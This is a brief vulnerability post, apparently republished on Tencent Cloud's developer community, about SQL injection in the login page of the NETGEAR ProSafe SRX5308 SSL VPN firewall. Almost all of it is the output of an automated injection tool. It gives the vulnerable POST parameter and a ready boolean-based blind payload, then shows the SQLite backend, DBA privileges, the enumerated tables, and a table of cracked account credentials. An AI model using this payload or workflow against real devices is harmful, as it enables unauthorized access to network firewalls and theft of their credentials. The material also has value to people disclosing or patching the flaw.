NETGEAR ProSafe WAN SSL VPN 防火墙 SQL注入漏洞
NETGEAR ProSafe™ Gigabit Quad WAN SSL VPN Firewall SRX5308
NETGEAR ProSafe™ - NETGEAR Configuration Manager Login
https://192.168.1.1/scgi-bin/platform.cgi
---
Parameter: USERDBDomains.Domainname (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: thispage=index.htm&USERDBUsers.UserName=oTcy&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain' AND 2477=2477 AND 'GOgI'='GOgI&button.login.USERDBUsers.router_status=Login&Login.userAgent=SmwH
Vector: AND [INFERENCE]
---
the back-end DBMS: SQLite
the back-end DBMS is SQLite
current user is DBA: True
available databases [1]:
[+] SQLite_masterdb
Database: SQLite_masterdb
[4 tables]
+----------+
| system |
| logging |
| services |
| zones |
+----------+
passwd and shadow encryption cracked
+---------------------+
| username | password |
+----------+----------+
| showid | password |
+----------+----------+
| guest | password |
+----------+----------+
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。